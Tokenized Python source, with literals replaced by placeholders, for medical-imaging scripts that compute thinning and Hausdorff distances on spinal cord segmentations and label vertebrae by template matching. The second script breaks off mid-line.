<s> import sys <EOL> import time <EOL> import os <EOL> import numpy as np <EOL> import sct_utils as sct <EOL> from msct_image import Image , get_dimension <EOL> from sct_image import set_orientation <EOL> from msct_parser import Parser <EOL> import msct_gmseg_utils as sct_gm <EOL> class Param : <EOL> def __init__ ( self ) : <EOL> self . debug = <NUM_LIT:0> <EOL> self . thinning = True <EOL> self . verbose = <NUM_LIT:1> <EOL> class Thinning : <EOL> def __init__ ( self , im , v = <NUM_LIT:1> ) : <EOL> sct . printv ( '<STR_LIT>' , v , '<STR_LIT>' ) <EOL> self . image = im <EOL> self . image . data = bin_data ( self . image . data ) <EOL> self . dim_im = len ( self . image . data . shape ) <EOL> if self . dim_im == <NUM_LIT:2> : <EOL> self . thinned_image = Image ( param = self . zhang_suen ( self . image . data ) , absolutepath = self . image . path + self . image . file_name + '<STR_LIT>' + self . image . ext , hdr = self . image . hdr ) <EOL> elif self . dim_im == <NUM_LIT:3> : <EOL> assert self . image . orientation == '<STR_LIT>' <EOL> thinned_data = np . asarray ( [ self . zhang_suen ( im_slice ) for im_slice in self . image . data ] ) <EOL> self . thinned_image = Image ( param = thinned_data , absolutepath = self . image . path + self . image . file_name + '<STR_LIT>' + self . image . ext , hdr = self . image . hdr ) <EOL> def get_neighbours ( self , x , y , image ) : <EOL> """<STR_LIT>""" <EOL> x_1 , y_1 , x1 , y1 = x - <NUM_LIT:1> , y - <NUM_LIT:1> , x + <NUM_LIT:1> , y + <NUM_LIT:1> <EOL> neighbours = [ image [ x_1 ] [ y ] , image [ x_1 ] [ y1 ] , image [ x ] [ y1 ] , image [ x1 ] [ y1 ] , <EOL> image [ x1 ] [ y ] , image [ x1 ] [ y_1 ] , image [ x ] [ y_1 ] , image [ x_1 ] [ y_1 ] ] <EOL> return neighbours <EOL> def transitions ( self , neighbours ) : <EOL> """<STR_LIT>""" <EOL> n = neighbours + neighbours [ <NUM_LIT:0> : <NUM_LIT:1> ] <EOL> s = np . sum ( ( n1 , n2 ) == ( <NUM_LIT:0> , <NUM_LIT:1> ) for n1 , n2 in zip ( n , n [ <NUM_LIT:1> : ] ) ) <EOL> return s <EOL> def zhang_suen ( self , image ) : <EOL> """<STR_LIT>""" <EOL> image_thinned = image . copy ( ) <EOL> changing1 = changing2 = <NUM_LIT:1> <EOL> while changing1 or changing2 : <EOL> changing1 = [ ] <EOL> max = len ( image_thinned ) - <NUM_LIT:1> <EOL> pass_list = [ <NUM_LIT:1> , max ] <EOL> for x , y in non_zero_coord ( image_thinned ) : <EOL> if x not in pass_list and y not in pass_list : <EOL> P2 , P3 , P4 , P5 , P6 , P7 , P8 , P9 = n = self . get_neighbours ( x , y , image_thinned ) <EOL> if ( <NUM_LIT:2> <= sum ( n ) <= <NUM_LIT:6> and <EOL> P2 * P4 * P6 == <NUM_LIT:0> and <EOL> P4 * P6 * P8 == <NUM_LIT:0> and <EOL> self . transitions ( n ) == <NUM_LIT:1> ) : <EOL> changing1 . append ( ( x , y ) ) <EOL> for x , y in changing1 : <EOL> image_thinned [ x ] [ y ] = <NUM_LIT:0> <EOL> changing2 = [ ] <EOL> for x , y in non_zero_coord ( image_thinned ) : <EOL> if x not in pass_list and y not in pass_list : <EOL> P2 , P3 , P4 , P5 , P6 , P7 , P8 , P9 = n = self . get_neighbours ( x , y , image_thinned ) <EOL> if ( <NUM_LIT:2> <= sum ( n ) <= <NUM_LIT:6> and <EOL> P2 * P4 * P8 == <NUM_LIT:0> and <EOL> P2 * P6 * P8 == <NUM_LIT:0> and <EOL> self . transitions ( n ) == <NUM_LIT:1> ) : <EOL> changing2 . append ( ( x , y ) ) <EOL> for x , y in changing2 : <EOL> image_thinned [ x ] [ y ] = <NUM_LIT:0> <EOL> return image_thinned <EOL> class HausdorffDistance : <EOL> def __init__ ( self , data1 , data2 , v = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> sct . printv ( '<STR_LIT>' , v , '<STR_LIT>' ) <EOL> self . data1 = bin_data ( data1 ) <EOL> self . data2 = bin_data ( data2 ) <EOL> self . min_distances_1 = self . relative_hausdorff_dist ( self . data1 , self . data2 , v ) <EOL> self . min_distances_2 = self . relative_hausdorff_dist ( self . data2 , self . data1 , v ) <EOL> self . h1 = np . max ( self . min_distances_1 ) <EOL> self . h2 = np . max ( self . min_distances_2 ) <EOL> self . H = max ( self . h1 , self . h2 ) <EOL> def relative_hausdorff_dist ( self , dat1 , dat2 , v = <NUM_LIT:1> ) : <EOL> h = np . zeros ( dat1 . shape ) <EOL> nz_coord_1 = non_zero_coord ( dat1 ) <EOL> nz_coord_2 = non_zero_coord ( dat2 ) <EOL> if len ( nz_coord_1 ) != <NUM_LIT:0> and len ( nz_coord_2 ) != <NUM_LIT:0> : <EOL> for x1 , y1 in nz_coord_1 : <EOL> d_p1_dat2 = [ ] <EOL> p1 = np . asarray ( [ x1 , y1 ] ) <EOL> for x2 , y2 in nz_coord_2 : <EOL> p2 = np . asarray ( [ x2 , y2 ] ) <EOL> d_p1_dat2 . append ( np . linalg . norm ( p1 - p2 ) ) <EOL> h [ x1 , y1 ] = min ( d_p1_dat2 ) <EOL> else : <EOL> sct . printv ( '<STR_LIT>' , v , '<STR_LIT>' ) <EOL> return h <EOL> class ComputeDistances : <EOL> def __init__ ( self , im1 , im2 = None , param = None ) : <EOL> self . im1 = im1 <EOL> self . im2 = im2 <EOL> self . dim_im = len ( self . im1 . data . shape ) <EOL> self . dim_pix = <NUM_LIT:0> <EOL> self . distances = None <EOL> self . res = '<STR_LIT>' <EOL> self . param = param <EOL> self . dist1_distribution = None <EOL> self . dist2_distribution = None <EOL> if self . dim_im == <NUM_LIT:3> : <EOL> self . orientation1 = self . im1 . orientation <EOL> if self . orientation1 != '<STR_LIT>' : <EOL> self . im1 = set_orientation ( self . im1 , '<STR_LIT>' ) <EOL> if self . im2 is not None : <EOL> self . orientation2 = self . im2 . orientation <EOL> if self . orientation2 != '<STR_LIT>' : <EOL> self . im2 = set_orientation ( self . im2 , '<STR_LIT>' ) <EOL> if self . param . thinning : <EOL> self . thinning1 = Thinning ( self . im1 , self . param . verbose ) <EOL> self . thinning1 . thinned_image . save ( ) <EOL> if self . im2 is not None : <EOL> self . thinning2 = Thinning ( self . im2 , self . param . verbose ) <EOL> self . thinning2 . thinned_image . save ( ) <EOL> if self . dim_im == <NUM_LIT:2> and self . im2 is not None : <EOL> self . compute_dist_2im_2d ( ) <EOL> if self . dim_im == <NUM_LIT:3> : <EOL> if self . im2 is None : <EOL> self . compute_dist_1im_3d ( ) <EOL> else : <EOL> self . compute_dist_2im_3d ( ) <EOL> if self . dim_im == <NUM_LIT:2> and self . distances is not None : <EOL> self . dist1_distribution = self . distances . min_distances_1 [ np . nonzero ( self . distances . min_distances_1 ) ] <EOL> self . dist2_distribution = self . distances . min_distances_2 [ np . nonzero ( self . distances . min_distances_2 ) ] <EOL> if self . dim_im == <NUM_LIT:3> : <EOL> self . dist1_distribution = [ ] <EOL> self . dist2_distribution = [ ] <EOL> for d in self . distances : <EOL> self . dist1_distribution . append ( d . min_distances_1 [ np . nonzero ( d . min_distances_1 ) ] ) <EOL> self . dist2_distribution . append ( d . min_distances_2 [ np . nonzero ( d . min_distances_2 ) ] ) <EOL> self . res = '<STR_LIT>' <EOL> for i , d in enumerate ( self . distances ) : <EOL> med1 = np . median ( self . dist1_distribution [ i ] ) <EOL> med2 = np . median ( self . dist2_distribution [ i ] ) <EOL> if self . im2 is None : <EOL> self . res += '<STR_LIT>' + str ( i ) + '<STR_LIT>' + str ( i + <NUM_LIT:1> ) + '<STR_LIT>' + str ( d . H * self . dim_pix ) + '<STR_LIT>' + str ( med1 * self . dim_pix ) + '<STR_LIT>' + str ( med2 * self . dim_pix ) + '<STR_LIT>' <EOL> else : <EOL> self . res += '<STR_LIT>' + str ( i ) + '<STR_LIT>' + str ( d . H * self . dim_pix ) + '<STR_LIT>' + str ( med1 * self . dim_pix ) + '<STR_LIT>' + str ( med2 * self . dim_pix ) + '<STR_LIT>' <EOL> sct . printv ( '<STR_LIT>' + <EOL> self . res , self . param . verbose , '<STR_LIT>' ) <EOL> if self . param . verbose == <NUM_LIT:2> : <EOL> self . show_results ( ) <EOL> def compute_dist_2im_2d ( self ) : <EOL> nx1 , ny1 , nz1 , nt1 , px1 , py1 , pz1 , pt1 = get_dimension ( self . im1 ) <EOL> nx2 , ny2 , nz2 , nt2 , px2 , py2 , pz2 , pt2 = get_dimension ( self . im2 ) <EOL> assert px1 == px2 and py1 == py2 and px1 == py1 <EOL> self . dim_pix = py1 <EOL> if self . param . thinning : <EOL> dat1 = self . thinning1 . thinned_image . data <EOL> dat2 = self . thinning2 . thinned_image . data <EOL> else : <EOL> dat1 = bin_data ( self . im1 . data ) <EOL> dat2 = bin_data ( self . im2 . data ) <EOL> self . distances = HausdorffDistance ( dat1 , dat2 , self . param . verbose ) <EOL> self . res = '<STR_LIT>' + str ( self . distances . H * self . dim_pix ) + '<STR_LIT>' '<STR_LIT>' + str ( self . distances . h1 * self . dim_pix ) + '<STR_LIT>' '<STR_LIT>' + str ( self . distances . h2 * self . dim_pix ) + '<STR_LIT>' <EOL> def compute_dist_1im_3d ( self ) : <EOL> nx1 , ny1 , nz1 , nt1 , px1 , py1 , pz1 , pt1 = get_dimension ( self . im1 ) <EOL> self . dim_pix = py1 <EOL> if self . param . thinning : <EOL> dat1 = self . thinning1 . thinned_image . data <EOL> else : <EOL> dat1 = bin_data ( self . im1 . data ) <EOL> self . distances = [ ] <EOL> for i , dat_slice in enumerate ( dat1 [ : - <NUM_LIT:1> ] ) : <EOL> self . distances . append ( HausdorffDistance ( bin_data ( dat_slice ) , bin_data ( dat1 [ i + <NUM_LIT:1> ] ) , self . param . verbose ) ) <EOL> def compute_dist_2im_3d ( self ) : <EOL> nx1 , ny1 , nz1 , nt1 , px1 , py1 , pz1 , pt1 = get_dimension ( self . im1 ) <EOL> nx2 , ny2 , nz2 , nt2 , px2 , py2 , pz2 , pt2 = get_dimension ( self . im2 ) <EOL> assert round ( pz1 , <NUM_LIT:5> ) == round ( pz2 , <NUM_LIT:5> ) and round ( py1 , <NUM_LIT:5> ) == round ( py2 , <NUM_LIT:5> ) <EOL> assert nx1 == nx2 <EOL> self . dim_pix = py1 <EOL> if self . param . thinning : <EOL> dat1 = self . thinning1 . thinned_image . data <EOL> dat2 = self . thinning2 . thinned_image . data <EOL> else : <EOL> dat1 = bin_data ( self . im1 . data ) <EOL> dat2 = bin_data ( self . im2 . data ) <EOL> self . distances = [ ] <EOL> for slice1 , slice2 in zip ( dat1 , dat2 ) : <EOL> self . distances . append ( HausdorffDistance ( slice1 , slice2 , self . param . verbose ) ) <EOL> def show_results ( self ) : <EOL> import seaborn as sns <EOL> import matplotlib . pyplot as plt <EOL> import pandas as pd <EOL> plt . hold ( True ) <EOL> sns . set ( style = "<STR_LIT>" , palette = "<STR_LIT>" , color_codes = True ) <EOL> plt . figure ( figsize = ( <NUM_LIT> , <NUM_LIT:20> ) ) <EOL> data_dist = { "<STR_LIT>" : [ ] , "<STR_LIT:image>" : [ ] , "<STR_LIT>" : [ ] } <EOL> if self . dim_im == <NUM_LIT:2> : <EOL> data_dist [ "<STR_LIT>" ] . append ( [ dist * self . dim_pix for dist in self . dist1_distribution ] ) <EOL> data_dist [ "<STR_LIT:image>" ] . append ( len ( self . dist1_distribution ) * [ <NUM_LIT:1> ] ) <EOL> data_dist [ "<STR_LIT>" ] . append ( len ( self . dist1_distribution ) * [ <NUM_LIT:0> ] ) <EOL> data_dist [ "<STR_LIT>" ] . append ( [ dist * self . dim_pix for dist in self . dist2_distribution ] ) <EOL> data_dist [ "<STR_LIT:image>" ] . append ( len ( self . dist2_distribution ) * [ <NUM_LIT:2> ] ) <EOL> data_dist [ "<STR_LIT>" ] . append ( len ( self . dist2_distribution ) * [ <NUM_LIT:0> ] ) <EOL> if self . dim_im == <NUM_LIT:3> : <EOL> for i in range ( len ( self . distances ) ) : <EOL> data_dist [ "<STR_LIT>" ] . append ( [ dist * self . dim_pix for dist in self . dist1_distribution [ i ] ] ) <EOL> data_dist [ "<STR_LIT:image>" ] . append ( len ( self . dist1_distribution [ i ] ) * [ <NUM_LIT:1> ] ) <EOL> data_dist [ "<STR_LIT>" ] . append ( len ( self . dist1_distribution [ i ] ) * [ i ] ) <EOL> data_dist [ "<STR_LIT>" ] . append ( [ dist * self . dim_pix for dist in self . dist2_distribution [ i ] ] ) <EOL> data_dist [ "<STR_LIT:image>" ] . append ( len ( self . dist2_distribution [ i ] ) * [ <NUM_LIT:2> ] ) <EOL> data_dist [ "<STR_LIT>" ] . append ( len ( self . dist2_distribution [ i ] ) * [ i ] ) <EOL> for k in data_dist . keys ( ) : <EOL> data_dist [ k ] = [ item for sublist in data_dist [ k ] for item in sublist ] <EOL> data_dist = pd . DataFrame ( data_dist ) <EOL> sns . violinplot ( x = "<STR_LIT>" , y = "<STR_LIT>" , hue = "<STR_LIT:image>" , data = data_dist , split = True , inner = "<STR_LIT>" , cut = <NUM_LIT:0> ) <EOL> plt . savefig ( '<STR_LIT>' ) <EOL> def bin_data ( data ) : <EOL> return np . asarray ( ( data > <NUM_LIT:0> ) . astype ( int ) ) <EOL> def non_zero_coord ( data ) : <EOL> dim = len ( data . shape ) <EOL> if dim == <NUM_LIT:3> : <EOL> X , Y , Z = ( data > <NUM_LIT:0> ) . nonzero ( ) <EOL> list_coordinates = [ ( X [ i ] , Y [ i ] , Z [ i ] ) for i in range ( <NUM_LIT:0> , len ( X ) ) ] <EOL> elif dim == <NUM_LIT:2> : <EOL> X , Y = ( data > <NUM_LIT:0> ) . nonzero ( ) <EOL> list_coordinates = [ ( X [ i ] , Y [ i ] ) for i in range ( <NUM_LIT:0> , len ( X ) ) ] <EOL> return list_coordinates <EOL> def get_parser ( ) : <EOL> parser = Parser ( __file__ ) <EOL> parser . usage . set_description ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = "<STR_LIT:file>" , <EOL> description = "<STR_LIT>" , <EOL> mandatory = True , <EOL> example = '<STR_LIT>' ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = "<STR_LIT:file>" , <EOL> description = "<STR_LIT>" , <EOL> mandatory = False , <EOL> default_value = None , <EOL> example = '<STR_LIT>' ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = None , <EOL> description = "<STR_LIT>" , <EOL> mandatory = False , <EOL> deprecated_by = '<STR_LIT>' ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = "<STR_LIT>" , <EOL> description = "<STR_LIT>" , <EOL> mandatory = False , <EOL> default_value = <NUM_LIT:1> , <EOL> example = [ '<STR_LIT:0>' , '<STR_LIT:1>' ] ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = None , <EOL> description = "<STR_LIT>" , <EOL> deprecated_by = "<STR_LIT>" , <EOL> mandatory = False ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = "<STR_LIT:float>" , <EOL> description = "<STR_LIT>" , <EOL> mandatory = False , <EOL> default_value = <NUM_LIT:0.1> , <EOL> example = <NUM_LIT:0.5> ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = "<STR_LIT>" , <EOL> description = "<STR_LIT>" , <EOL> mandatory = False , <EOL> default_value = '<STR_LIT>' , <EOL> example = '<STR_LIT>' ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = "<STR_LIT:int>" , <EOL> description = "<STR_LIT>" , <EOL> mandatory = False , <EOL> default_value = <NUM_LIT:0> , <EOL> example = '<STR_LIT:1>' ) <EOL> return parser <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> param = Param ( ) <EOL> input_fname = None <EOL> if param . debug : <EOL> print '<STR_LIT>' <EOL> else : <EOL> param_default = Param ( ) <EOL> parser = get_parser ( ) <EOL> arguments = parser . parse ( sys . argv [ <NUM_LIT:1> : ] ) <EOL> input_fname = arguments [ "<STR_LIT>" ] <EOL> input_second_fname = '<STR_LIT>' <EOL> output_fname = '<STR_LIT>' <EOL> resample_to = <NUM_LIT:0.1> <EOL> if "<STR_LIT>" in arguments : <EOL> input_second_fname = arguments [ "<STR_LIT>" ] <EOL> if "<STR_LIT>" in arguments : <EOL> param . thinning = bool ( int ( arguments [ "<STR_LIT>" ] ) ) <EOL> if "<STR_LIT>" in arguments : <EOL> resample_to = arguments [ "<STR_LIT>" ] <EOL> if "<STR_LIT>" in arguments : <EOL> output_fname = arguments [ "<STR_LIT>" ] <EOL> if "<STR_LIT>" in arguments : <EOL> param . verbose = int ( arguments [ "<STR_LIT>" ] ) <EOL> tmp_dir = '<STR_LIT>' + time . strftime ( "<STR_LIT>" ) <EOL> sct . run ( '<STR_LIT>' + tmp_dir ) <EOL> im1_name = "<STR_LIT>" <EOL> sct . run ( '<STR_LIT>' + input_fname + '<STR_LIT:U+0020>' + tmp_dir + '<STR_LIT:/>' + im1_name ) <EOL> if input_second_fname != '<STR_LIT>' : <EOL> im2_name = '<STR_LIT>' <EOL> sct . run ( '<STR_LIT>' + input_second_fname + '<STR_LIT:U+0020>' + tmp_dir + '<STR_LIT:/>' + im2_name ) <EOL> else : <EOL> im2_name = None <EOL> os . chdir ( tmp_dir ) <EOL> input_im1 = Image ( sct_gm . resample_image ( im1_name , binary = True , thr = <NUM_LIT:0.5> , npx = resample_to , npy = resample_to ) ) <EOL> if im2_name is not None : <EOL> input_im2 = Image ( sct_gm . resample_image ( im2_name , binary = True , thr = <NUM_LIT:0.5> , npx = resample_to , npy = resample_to ) ) <EOL> else : <EOL> input_im2 = None <EOL> computation = ComputeDistances ( input_im1 , im2 = input_im2 , param = param ) <EOL> res_fic = open ( '<STR_LIT>' + output_fname , '<STR_LIT:w>' ) <EOL> res_fic . write ( computation . res ) <EOL> res_fic . write ( '<STR_LIT>' + input_fname ) <EOL> res_fic . write ( '<STR_LIT>' + input_second_fname ) <EOL> res_fic . close ( ) <EOL> if param . thinning : <EOL> sct . run ( '<STR_LIT>' + computation . thinning1 . thinned_image . file_name + computation . thinning1 . thinned_image . ext + '<STR_LIT>' + sct . extract_fname ( input_fname ) [ <NUM_LIT:1> ] + '<STR_LIT>' + sct . extract_fname ( input_fname ) [ <NUM_LIT:2> ] ) <EOL> if im2_name is not None : <EOL> sct . run ( '<STR_LIT>' + computation . thinning2 . thinned_image . file_name + computation . thinning2 . thinned_image . ext + '<STR_LIT>' + sct . extract_fname ( input_second_fname ) [ <NUM_LIT:1> ] + '<STR_LIT>' + sct . extract_fname ( input_second_fname ) [ <NUM_LIT:2> ] ) <EOL> os . chdir ( '<STR_LIT:..>' ) </s>
<s> import sys <EOL> from os import chdir <EOL> from glob import glob <EOL> import numpy as np <EOL> from scipy . signal import argrelextrema , gaussian <EOL> from sct_utils import extract_fname , printv , run , generate_output_file , slash_at_the_end , tmp_create <EOL> from msct_parser import Parser <EOL> from msct_image import Image <EOL> def get_parser ( ) : <EOL> parser = Parser ( __file__ ) <EOL> parser . usage . set_description ( '''<STR_LIT>''' ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = "<STR_LIT:file>" , <EOL> description = "<STR_LIT>" , <EOL> mandatory = True , <EOL> example = "<STR_LIT>" ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = "<STR_LIT:file>" , <EOL> description = "<STR_LIT>" , <EOL> mandatory = True , <EOL> deprecated_by = '<STR_LIT>' , <EOL> example = "<STR_LIT>" ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = "<STR_LIT:file>" , <EOL> description = "<STR_LIT>" , <EOL> mandatory = True , <EOL> example = "<STR_LIT>" ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = [ [ '<STR_LIT:U+002C>' ] , '<STR_LIT:int>' ] , <EOL> description = '<STR_LIT>' , <EOL> mandatory = False , <EOL> example = [ '<STR_LIT>' ] ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = '<STR_LIT:int>' , <EOL> description = '<STR_LIT>' , <EOL> mandatory = False ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = '<STR_LIT:file>' , <EOL> description = '<STR_LIT>' , <EOL> mandatory = False ) <EOL> parser . add_option ( name = '<STR_LIT>' , <EOL> type_value = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> mandatory = False , <EOL> default_value = '<STR_LIT>' , <EOL> example = '<STR_LIT>' ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = "<STR_LIT>" , <EOL> description = "<STR_LIT>" , <EOL> mandatory = False , <EOL> default_value = '<STR_LIT>' ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = "<STR_LIT>" , <EOL> description = "<STR_LIT>" , <EOL> mandatory = False , <EOL> default_value = '<STR_LIT:0>' , <EOL> example = [ '<STR_LIT:0>' , '<STR_LIT:1>' ] ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = "<STR_LIT>" , <EOL> description = "<STR_LIT>" , <EOL> mandatory = False , <EOL> default_value = '<STR_LIT:0>' , <EOL> example = [ '<STR_LIT:0>' , '<STR_LIT:1>' ] ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = "<STR_LIT>" , <EOL> description = "<STR_LIT>" , <EOL> mandatory = False , <EOL> default_value = '<STR_LIT:1>' , <EOL> example = [ '<STR_LIT:0>' , '<STR_LIT:1>' ] ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = "<STR_LIT>" , <EOL> description = """<STR_LIT>""" , <EOL> mandatory = False , <EOL> default_value = '<STR_LIT:1>' , <EOL> example = [ '<STR_LIT:0>' , '<STR_LIT:1>' , '<STR_LIT:2>' ] ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = None , <EOL> description = "<STR_LIT>" , <EOL> mandatory = False ) <EOL> return parser <EOL> def calc_MI ( x , y , bins ) : <EOL> from sklearn . metrics import mutual_info_score <EOL> c_xy = np . histogram2d ( x , y , bins ) [ <NUM_LIT:0> ] <EOL> mi = mutual_info_score ( None , None , contingency = c_xy ) <EOL> return mi <EOL> def main ( args = None ) : <EOL> initz = '<STR_LIT>' <EOL> initcenter = '<STR_LIT>' <EOL> if not args : <EOL> args = sys . argv [ <NUM_LIT:1> : ] <EOL> parser = get_parser ( ) <EOL> arguments = parser . parse ( sys . argv [ <NUM_LIT:1> : ] ) <EOL> fname_in = arguments [ "<STR_LIT>" ] <EOL> fname_seg = arguments [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in arguments : <EOL> file_out = arguments [ "<STR_LIT>" ] <EOL> else : <EOL> file_out = '<STR_LIT>' <EOL> if '<STR_LIT>' in arguments : <EOL> path_output = arguments [ '<STR_LIT>' ] <EOL> else : <EOL> path_output = '<STR_LIT>' <EOL> if '<STR_LIT>' in arguments : <EOL> initz = arguments [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in arguments : <EOL> initcenter = arguments [ '<STR_LIT>' ] <EOL> verbose = int ( arguments [ '<STR_LIT>' ] ) <EOL> remove_tmp_files = int ( arguments [ '<STR_LIT>' ] ) <EOL> denoise = int ( arguments [ '<STR_LIT>' ] ) <EOL> laplacian = int ( arguments [ '<STR_LIT>' ] ) <EOL> printv ( '<STR_LIT>' , verbose ) <EOL> path_tmp = tmp_create ( verbose = verbose ) <EOL> printv ( '<STR_LIT>' , verbose ) <EOL> run ( '<STR_LIT>' + fname_in + '<STR_LIT>' + path_tmp + '<STR_LIT>' ) <EOL> run ( '<STR_LIT>' + fname_seg + '<STR_LIT>' + path_tmp + '<STR_LIT>' ) <EOL> chdir ( path_tmp ) <EOL> printv ( '<STR_LIT>' , verbose ) <EOL> if initz : <EOL> create_label_z ( '<STR_LIT>' , initz [ <NUM_LIT:0> ] , initz [ <NUM_LIT:1> ] ) <EOL> elif initcenter : <EOL> nii = Image ( '<STR_LIT>' ) <EOL> nii . change_orientation ( '<STR_LIT>' ) <EOL> nx , ny , nz , nt , px , py , pz , pt = nii . dim <EOL> z_center = int ( round ( nz / <NUM_LIT:2> ) ) <EOL> create_label_z ( '<STR_LIT>' , z_center , initcenter ) <EOL> else : <EOL> printv ( '<STR_LIT>' , <NUM_LIT:1> , '<STR_LIT:error>' ) <EOL> printv ( '<STR_LIT>' , verbose ) <EOL> run ( '<STR_LIT>' ) <EOL> printv ( '<STR_LIT>' , verbose ) <EOL> run ( '<STR_LIT>' , verbose ) <EOL> printv ( '<STR_LIT>' , verbose ) <EOL> run ( '<STR_LIT>' , verbose ) <EOL> run ( '<STR_LIT>' , verbose ) <EOL> printv ( '<STR_LIT>' , verbose ) <EOL> run ( '<STR_LIT>' , verbose ) <EOL> printv ( '<STR_LIT>' , verbose ) <EOL> init_disc = get_z_and_disc_values_from_label ( '<STR_LIT>' ) <EOL> printv ( '<STR_LIT>' + str ( init_disc ) , verbose ) <EOL> if denoise : <EOL> printv ( '<STR_LIT>' , verbose ) <EOL> run ( '<STR_LIT>' , verbose ) <EOL> if laplacian : <EOL> printv ( '<STR_LIT>' , verbose ) <EOL> run ( '<STR_LIT>' , verbose ) <EOL> vertebral_detection ( '<STR_LIT>' , '<STR_LIT>' , init_disc , verbose , laplacian ) <EOL> printv ( '<STR_LIT>' , verbose ) <EOL> run ( '<STR_LIT>' , verbose ) <EOL> printv ( '<STR_LIT>' , verbose ) <EOL> clean_labeled_segmentation ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if file_out == '<STR_LIT>' : <EOL> path_seg , file_seg , ext_seg = extract_fname ( fname_seg ) <EOL> file_out = file_seg + '<STR_LIT>' + ext_seg <EOL> chdir ( '<STR_LIT:..>' ) <EOL> printv ( '<STR_LIT>' , verbose ) <EOL> generate_output_file ( path_tmp + '<STR_LIT>' , path_output + file_out ) <EOL> if remove_tmp_files == <NUM_LIT:1> : <EOL> printv ( '<STR_LIT>' , verbose ) <EOL> run ( '<STR_LIT>' + path_tmp ) <EOL> printv ( '<STR_LIT>' , verbose ) <EOL> printv ( '<STR_LIT>' + fname_in + '<STR_LIT:U+0020>' + path_output + file_out + '<STR_LIT>' , verbose , '<STR_LIT:info>' ) <EOL> def vertebral_detection ( fname , fname_seg , init_disc , verbose , laplacian = <NUM_LIT:0> ) : <EOL> shift_AP = <NUM_LIT:32> <EOL> size_AP = <NUM_LIT:11> <EOL> size_RL = <NUM_LIT:1> <EOL> size_IS = <NUM_LIT> <EOL> smooth_factor = [ <NUM_LIT:9> , <NUM_LIT:3> , <NUM_LIT:1> ] <EOL> thr_corr = <NUM_LIT> <EOL> fig_anat_straight = <NUM_LIT:1> <EOL> fig_pattern = <NUM_LIT:2> <EOL> contrast_template = '<STR_LIT>' <EOL> if contrast_template == '<STR_LIT>' : <EOL> contrast_template = '<STR_LIT>' <EOL> elif contrast_template == '<STR_LIT>' : <EOL> contrast_template = '<STR_LIT>' <EOL> from os import path <EOL> path_script = path . dirname ( __file__ ) <EOL> path_sct = slash_at_the_end ( path . dirname ( path_script ) , <NUM_LIT:1> ) <EOL> folder_template = '<STR_LIT>' <EOL> fname_template_list = glob ( path_sct + folder_template + '<STR_LIT:*>' + contrast_template + '<STR_LIT>' ) <EOL> fname_template = fname_template_list [ <NUM_LIT:0> ] <EOL> fname_disc_list = glob ( path_sct + folder_template + '<STR_LIT>' ) <EOL> fname_disc = fname_disc_list [ <NUM_LIT:0> ] <EOL> data_template = Image ( fname_template ) . data <EOL> data_disc_template = Image ( fname_disc ) . data <EOL> if laplacian : <EOL> printv ( '<STR_LIT>' , verbose ) <EOL> from sct_maths import laplacian <EOL> data_template = laplacian ( data_template . astype ( float ) , [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] ) <EOL> list_disc_value_template = sorted ( data_disc_template [ data_disc_template . nonzero ( ) ] ) <EOL> list_disc_z_template = [ int ( np . where ( data_disc_template == list_disc_value_template [ i ] ) [ <NUM_LIT:2> ] ) for i in range ( len ( list_disc_value_template ) ) ] <EOL> printv ( '<STR_LIT>' + str ( list_disc_value_template ) , verbose ) <EOL> list_distance_template = ( np . diff ( list_disc_z_template ) * ( - <NUM_LIT:1> ) ) . tolist ( ) <EOL> printv ( '<STR_LIT>' + str ( list_distance_template ) , verbose ) <EOL> if verbose == <NUM_LIT:2> : <EOL> import matplotlib . pyplot as plt <EOL> plt . ion ( ) <EOL> img = Image ( fname ) <EOL> data = img . data <EOL> from scipy . ndimage . filters import gaussian_filter <EOL> data = gaussian_filter ( data , smooth_factor , output = None , mode = "<STR_LIT>" ) <EOL> nx , ny , nz , nt , px , py , pz , pt = img . dim <EOL> z = range ( nz ) <EOL> xc = int ( round ( nx / <NUM_LIT:2> ) ) <EOL> yc = int ( round ( ny / <NUM_LIT:2> ) ) <EOL> if verbose == <NUM_LIT:2> : <EOL> plt . matshow ( np . mean ( data [ xc - size_RL : xc + size_RL , : , : ] , axis = <NUM_LIT:0> ) . transpose ( ) , fignum = fig_anat_straight , cmap = plt . cm . gray , origin = '<STR_LIT>' ) <EOL> plt . title ( '<STR_LIT>' ) <EOL> plt . autoscale ( enable = False ) <EOL> printv ( '<STR_LIT>' , verbose ) <EOL> current_z = init_disc [ <NUM_LIT:0> ] <EOL> current_disc = init_disc [ <NUM_LIT:1> ] <EOL> list_disc_z = [ ] <EOL> list_disc_value = [ ] <EOL> direction = '<STR_LIT>' <EOL> search_next_disc = True <EOL> while search_next_disc : <EOL> printv ( '<STR_LIT>' + str ( current_disc ) + '<STR_LIT>' + str ( current_z ) + '<STR_LIT>' + direction , verbose ) <EOL> try : <EOL> current_z_template = int ( np . where ( 